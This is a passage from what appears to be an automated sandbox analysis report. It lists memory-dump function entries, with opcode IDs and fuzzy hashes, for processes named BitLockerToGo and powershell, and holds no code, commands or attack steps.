                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a516c7d6acc521e2393e8d84e0e67b0943c7857d48de5ead52d14a9fa09e1159
                                                                                      • Instruction ID: cf4b5c0d9d7968950b0024139e79be9cf59eae930e50db42962990a8c2ca841d
                                                                                      • Opcode Fuzzy Hash: a516c7d6acc521e2393e8d84e0e67b0943c7857d48de5ead52d14a9fa09e1159
                                                                                      • Instruction Fuzzy Hash: 0FB1CE715482108BC724CF18C8A27ABB3F1EF9536CF28D61DE8955B391E335E906CB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ece6586775ac9d1530f51bc199729e638f83f3d6eace3cf54fec2914d1b9cd2
                                                                                      • Instruction ID: ef554066c1cb413ba75044d75a191fb4cd52654c99744243a53c1feda8e324df
                                                                                      • Opcode Fuzzy Hash: 2ece6586775ac9d1530f51bc199729e638f83f3d6eace3cf54fec2914d1b9cd2
                                                                                      • Instruction Fuzzy Hash: 57B1D471A44B018FD728CF29C890666B3E2FF89314B28E96DD99787795EB34F452CB00
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 37c73a1fa01377c58c4772a757f4c99c244b855286bfecfbf8538ae23515e5b7
                                                                                      • Instruction ID: c341e9b71bcdfa8137e1bda2fb81bbf20093232d40747a7b81dd33c290b304e6
                                                                                      • Opcode Fuzzy Hash: 37c73a1fa01377c58c4772a757f4c99c244b855286bfecfbf8538ae23515e5b7
                                                                                      • Instruction Fuzzy Hash: 82A19E35A94B41CFD768CF2AC490A22B3F2FF89315B5989ACD58687B51D731F8A1CB00
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a631cf9774d8d61bf4e3bd680822faecca51c11ab26b6792abd4cd6806838f5
                                                                                      • Instruction ID: 9925880471747272048304668796ae2e7ba67471a8f599ccee8081a93fc61d4e
                                                                                      • Opcode Fuzzy Hash: 4a631cf9774d8d61bf4e3bd680822faecca51c11ab26b6792abd4cd6806838f5
                                                                                      • Instruction Fuzzy Hash: 9361B1B0A80B008FE729DF75D990B63B3E6AF89304F24E86CD69687655EB71F441CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e10da55844631e2e9bd156a321fea25bb65350cf920f77ad855f2c1ab8031f35
                                                                                      • Instruction ID: 9b8eb15867f4b081404cc6a39d2f3fb9c8c1460d84c6dde19d13660dfbfeab68
                                                                                      • Opcode Fuzzy Hash: e10da55844631e2e9bd156a321fea25bb65350cf920f77ad855f2c1ab8031f35
                                                                                      • Instruction Fuzzy Hash: 10617FB0640B418FE726CF68C990766B7E5FF46314F24A92CE49ACB792E774E441CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5304fcc587d5678457e1b2f5345415f573820826b3f0510e4626012c4714251
                                                                                      • Instruction ID: 7b22273a84cf577dd8085f5ff9a6018d0998426d4dc1e0ff32256a6026a18822
                                                                                      • Opcode Fuzzy Hash: c5304fcc587d5678457e1b2f5345415f573820826b3f0510e4626012c4714251
                                                                                      • Instruction Fuzzy Hash: 5A51F371A483541FD725CE38988076BBAD9AB8222CF08D63DF8A98B3C1D734D809C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bb30f59446aa3b1651e84a2248e93dbde334518af68fffa4de753d87a5960d81
                                                                                      • Instruction ID: c15daae3fca0358fe33ce7936f9e97064c5a3ec184cae9e0be16a7558adc8443
                                                                                      • Opcode Fuzzy Hash: bb30f59446aa3b1651e84a2248e93dbde334518af68fffa4de753d87a5960d81
                                                                                      • Instruction Fuzzy Hash: F5615474A40F018BE325CF26C4A1B53B7F1EF45318F14992DD9E687AA1D739F48A8B44
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5e79e11f5acfda87f3e3868071d08fa9d5be27303d5baebaf5417e369758e37
                                                                                      • Instruction ID: 7c603ad4214dd678ef98ead114883456393cb772bdbc2c067801173b5dbcd9f1
                                                                                      • Opcode Fuzzy Hash: c5e79e11f5acfda87f3e3868071d08fa9d5be27303d5baebaf5417e369758e37
                                                                                      • Instruction Fuzzy Hash: 5E4138B69483044BD7119FA4DA8476BB7DCAFD1318F29AA3CE88887391E771D805C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d25c91af3de49dd89b6b3f4387ff5dbf682b06aaf89be2b5eae7074ce3bc2388
                                                                                      • Instruction ID: 49c50c807266586bd772e5515ce39e61a1dc55cf4a8d68056e34cd8d3bf8be2d
                                                                                      • Opcode Fuzzy Hash: d25c91af3de49dd89b6b3f4387ff5dbf682b06aaf89be2b5eae7074ce3bc2388
                                                                                      • Instruction Fuzzy Hash: 9D41E922B481614BCB198A3DCC512BBBBD39FC5249F1DD579ECC9DB34AE674D9008790
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 397b4e95b5fa5a71a68d653741c8372383a62cb40a32af2d3cbbf835a96baffc
                                                                                      • Instruction ID: 6da332c07ebfe3ccbf7f2c92c8a4abd7264e447e902584d7517c0b54c6e6766f
                                                                                      • Opcode Fuzzy Hash: 397b4e95b5fa5a71a68d653741c8372383a62cb40a32af2d3cbbf835a96baffc
                                                                                      • Instruction Fuzzy Hash: 3431FE746442019BC7179E2AC8806A7B7E1EF8431DF14E92CED9ACB351D331D843CB52
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                      • Instruction ID: 5350ed73a497343eaee281a1b420797da51e947076bc07410e862b784af1a79b
                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                      • Instruction Fuzzy Hash: 1211CA336851E40EC7198D3C84005E97FA30A93179B59D399E4B9DF1D2D6328DCA9354
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32b563c44b3fa0a2819769ba8dc05c896ad3de75dc77d5297ba0da4099a0c848
                                                                                      • Instruction ID: 725e64e182b95fe3726e53919c70a902ca3b87867b1b0dc8b0b5a80bb58f8be7
                                                                                      • Opcode Fuzzy Hash: 32b563c44b3fa0a2819769ba8dc05c896ad3de75dc77d5297ba0da4099a0c848
                                                                                      • Instruction Fuzzy Hash: 9A01D4F968030147DB209F50B4C0B27B2BDAF8170CF08E53CE92857241EB71F80ACA91
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27c5cc63a331d697be9a85cc62796f67cbe0500bebd542c3872c16e77f914160
                                                                                      • Instruction ID: 7edb5832312b26659bfdb68b800309ce7866674d6940d96f8b6c494de83fffef
                                                                                      • Opcode Fuzzy Hash: 27c5cc63a331d697be9a85cc62796f67cbe0500bebd542c3872c16e77f914160
                                                                                      • Instruction Fuzzy Hash: 37018071A04B818FD326CB1AC490666BBF2AF56304F18589DD4CBC7A62D724E445CB15
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ace0fbc49c9d521b01612636e5d1dcd821869d73578c330851836bbdd2c5109
                                                                                      • Instruction ID: b30d90c18cba2bdf563a1b72d05febd9ca3c8188092197f8ca2d69ce081f15dd
                                                                                      • Opcode Fuzzy Hash: 7ace0fbc49c9d521b01612636e5d1dcd821869d73578c330851836bbdd2c5109
                                                                                      • Instruction Fuzzy Hash: 971118706883818BD719CF11D5A062FB7E2FFC9208F299E2CE1E61B785C7349416CB5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23ef38b90ce7a23c00e0e8b889341b0da126878721bf406344124ea789d50c23
                                                                                      • Instruction ID: 5c41a205f76e7a3ad965801fb571baa26f6c3b137bc523be20fa346e2ce0fe13
                                                                                      • Opcode Fuzzy Hash: 23ef38b90ce7a23c00e0e8b889341b0da126878721bf406344124ea789d50c23
                                                                                      • Instruction Fuzzy Hash: 88F0E9777951165BAB21CC6AD8C0977F396EBC6119B19987CE945F3201C531E40183D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                                                                                      • Instruction ID: 2bc43229d8f9d0124d59ec089037abeaca0151c4daa21a03baaa5d3dd6d6bf69
                                                                                      • Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                                                                                      • Instruction Fuzzy Hash: 58E0CD7AB55611065B68CE169801677F3E5EAD6715B4CF52DD442D3108D234C4404164
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                      • Instruction ID: 48224bb7dcbe9c5be87e1971e4999b6b0b8be21a886783792d34dc9c4b8b7dcb
                                                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                      • Instruction Fuzzy Hash: B4D0A7615887B50E57598D3844A04F7FBF8ED4B51AF5C64DEE4D2E3109D324D8054698
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99d8efe6d5a974d57340528c82d7ccc39d9f09743d1eea503a7854d204b67cbe
                                                                                      • Instruction ID: 0769264d592beb15d230f9b246fe74504ee50215f1193d5603fc2d0e579f9a71
                                                                                      • Opcode Fuzzy Hash: 99d8efe6d5a974d57340528c82d7ccc39d9f09743d1eea503a7854d204b67cbe
                                                                                      • Instruction Fuzzy Hash: A7A00234EC81008B814CCE1190508B1E335A797101E517409D165335408A11D455991D
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: String
                                                                                      • String ID: W$g$h$k$l$r$u
                                                                                      • API String ID: 2568140703-629726492
                                                                                      • Opcode ID: da1b1c9ac3754ced71162eecdec37c3a1bdccbaf79a90956d42ed35e94bf069b
                                                                                      • Instruction ID: e213a55c78c44d29242bc180d09f8db23a0872b791df8f81e83bb3b4537dcf79
                                                                                      • Opcode Fuzzy Hash: da1b1c9ac3754ced71162eecdec37c3a1bdccbaf79a90956d42ed35e94bf069b
                                                                                      • Instruction Fuzzy Hash: 0891C472A4C7818FC735CA2CC4943DEBBD2ABE5314F098A2CD4D98B385EA759446CB52
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$DeleteMetricsSelectSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3911056724-3916222277
                                                                                      • Opcode ID: a8bb499868ab5ee60a1e1ceabd5bfbb5d55fcf9c97934916fc2deaedbd6ad78d
                                                                                      • Instruction ID: 6c92f1aa802b0809cfdad4eadf66341c3d2564edd9d502580f17001c5437fe1c
                                                                                      • Opcode Fuzzy Hash: a8bb499868ab5ee60a1e1ceabd5bfbb5d55fcf9c97934916fc2deaedbd6ad78d
                                                                                      • Instruction Fuzzy Hash: 5B817DB4A04B40DFC390EF29D585A16BBF0FB89304F50892DE99AC7755D731A858CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 3ccf32636bff9f09f77a0694aa7dcd55c7f56339517070cf3da103ed6915996a
                                                                                      • Instruction ID: 753f64ec370a627ca119193911f445981b4c23203d0fc8c6a2bfbd10e5647bbb
                                                                                      • Opcode Fuzzy Hash: 3ccf32636bff9f09f77a0694aa7dcd55c7f56339517070cf3da103ed6915996a
                                                                                      • Instruction Fuzzy Hash: 2E516B30A0C9594FE768FA1CAC456B6BBD0EF99331F14517AE88DC33A2CA15AC9183D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 968ade72f43b98efbb54aa762431712a9b1a71ba46fea7b7135e064c1463d165
                                                                                      • Instruction ID: 0b2fbfeb25657b1db204fe96d63e11c3751846eb586236ca5076ac1365c55bfd
                                                                                      • Opcode Fuzzy Hash: 968ade72f43b98efbb54aa762431712a9b1a71ba46fea7b7135e064c1463d165
                                                                                      • Instruction Fuzzy Hash: F6221A3460894D8FDB98EF1CC898AA977E1FF69311B0501A9E85ED73A1DB35EC51CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8cc44d7b818f6f2e33c38b85ff1f3179167943ccd8d206efdd9eb21d3ecdf06
                                                                                      • Instruction ID: 203d53151eb97485cc9921c8b61db8c2d53e65d4c89a7c7a7144bdfccf8aebe9
                                                                                      • Opcode Fuzzy Hash: c8cc44d7b818f6f2e33c38b85ff1f3179167943ccd8d206efdd9eb21d3ecdf06
                                                                                      • Instruction Fuzzy Hash: A0815431F18D1E4BEB94FB6898555BDA3D2FF58760B804275D40EC32D6DF28B8428791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0134b3c8f9d183bdabbc80397fc0bbef91fd424a63087c17bdadbbd1bfe32994
                                                                                      • Instruction ID: de2f120a2fa7c0eb68dfcf40973c9b5ecdf93ab9fc0a8215116bb9552d9147cb
                                                                                      • Opcode Fuzzy Hash: 0134b3c8f9d183bdabbc80397fc0bbef91fd424a63087c17bdadbbd1bfe32994
                                                                                      • Instruction Fuzzy Hash: 6671F721A0C95A8FE755EF2C98552F9BBE1EF96261F8442B7C44DC32C2CF28781587E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e794ecf56fdd46701e4cdd06ae0dd5465748b8dbc281a53bfd9c024ce2cef9c
                                                                                      • Instruction ID: 7be19c240c1d5ecdcac9a47dd049075c2936c40bdfa69bb75ede155d1b7c970f
                                                                                      • Opcode Fuzzy Hash: 8e794ecf56fdd46701e4cdd06ae0dd5465748b8dbc281a53bfd9c024ce2cef9c
                                                                                      • Instruction Fuzzy Hash: 0651E331A0C9184FDB59EB2898567B9B7E1FF85320F4441BAD80EC7296DE24BC5287D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0224168a29acd2e783bae9a71842fbf2569d43f0932ddc6284c30ab862858916
                                                                                      • Instruction ID: 53e2df20f6c655aec829b3a7925cd268f0ab9a7e5e449a48c49af2fbdae88598
                                                                                      • Opcode Fuzzy Hash: 0224168a29acd2e783bae9a71842fbf2569d43f0932ddc6284c30ab862858916
                                                                                      • Instruction Fuzzy Hash: BB512621B0CE4A4FE755BB3C5C5A2B9BBD1DF89220B4441FBD84DC3292DE29B85683D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                      • Instruction ID: 8d8f64367d2971bd231c3a6d09d3291d773e2ba822151b3f41d828e4db0393b7
                                                                                      • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                      • Instruction Fuzzy Hash: 7841E63131981C8FDA94EB1CE898E6877E1FF6C31275605E6E44ACB375DA26EC81CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 31f7978babac8551c64e9bb849f746f9f3482af39f66a5e35b9578b2fc9368e5
                                                                                      • Instruction ID: c48a06370bc0b7dd0d88802da3e4e807184336064f34b50a125de7ce3b80d45b
                                                                                      • Opcode Fuzzy Hash: 31f7978babac8551c64e9bb849f746f9f3482af39f66a5e35b9578b2fc9368e5
                                                                                      • Instruction Fuzzy Hash: F841927290C54A8FE794EE289C252B9BBE1EF55360FC4417AD849C32D2DF28782587E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 814d3340142304e6a839d91af851343db3c1ad99c72aaeb352a50747e4f5de05
                                                                                      • Instruction ID: fe537980807b2fe450833bfe2ef45a2e495f1eb87ac31f44caa734211cf4cb34
                                                                                      • Opcode Fuzzy Hash: 814d3340142304e6a839d91af851343db3c1ad99c72aaeb352a50747e4f5de05
                                                                                      • Instruction Fuzzy Hash: F141A130A0C90A5FEB94FA6C9845AB5B3D1EF54320B948179D89EC33A6DF29FC518790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f09065d71351fd6169dd3f0d9b3ff0046d5a4853ac365f14552db1af513a2fd
                                                                                      • Instruction ID: 105fb44ae4478e2e7fbfd75b44c085e9c51637e70a62edef835f6696d1a1f921
                                                                                      • Opcode Fuzzy Hash: 6f09065d71351fd6169dd3f0d9b3ff0046d5a4853ac365f14552db1af513a2fd
                                                                                      • Instruction Fuzzy Hash: 3231503190895E8FEB94EE1898153BDB6E1EF98360F84457AE80DD33D1DF28A86587D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7d2a1c8e9c3df3248b5d78b8a3b9610a4b7a7b4caa3ed0e4f9a8c3e82917cf68
                                                                                      • Instruction ID: 2f09f49404284d61482a9d05e20fa1cc5f235bb29fa1fd9449d7fcd9f4c047cb
                                                                                      • Opcode Fuzzy Hash: 7d2a1c8e9c3df3248b5d78b8a3b9610a4b7a7b4caa3ed0e4f9a8c3e82917cf68
                                                                                      • Instruction Fuzzy Hash: 3D3191316089184FDF58EA18DC82BB9B3E1FB89324F5041B9D84ED7296DE20BC528BD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6656e2f7006d03bcd82bddc0389f632538c126e7727aea3c6f95e2691d6e5cd2
                                                                                      • Instruction ID: d5a50b0a83fa8f6612af6e48f69bba81b17532eccea77516d457f93009827d8b
                                                                                      • Opcode Fuzzy Hash: 6656e2f7006d03bcd82bddc0389f632538c126e7727aea3c6f95e2691d6e5cd2
                                                                                      • Instruction Fuzzy Hash: 35316030A0C9494FDB98EB28C854B75B7D1EF99320F9481B9D48EC7392DE19BC92C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fbc0b9c2f85546082733b9c74fa6f673f382da9e2a93cb7f0ed79f7b025c57a
                                                                                      • Instruction ID: 69f4341e98d213a794ac15312b499d06ca84da76a238852b20e3bff52f3a2186
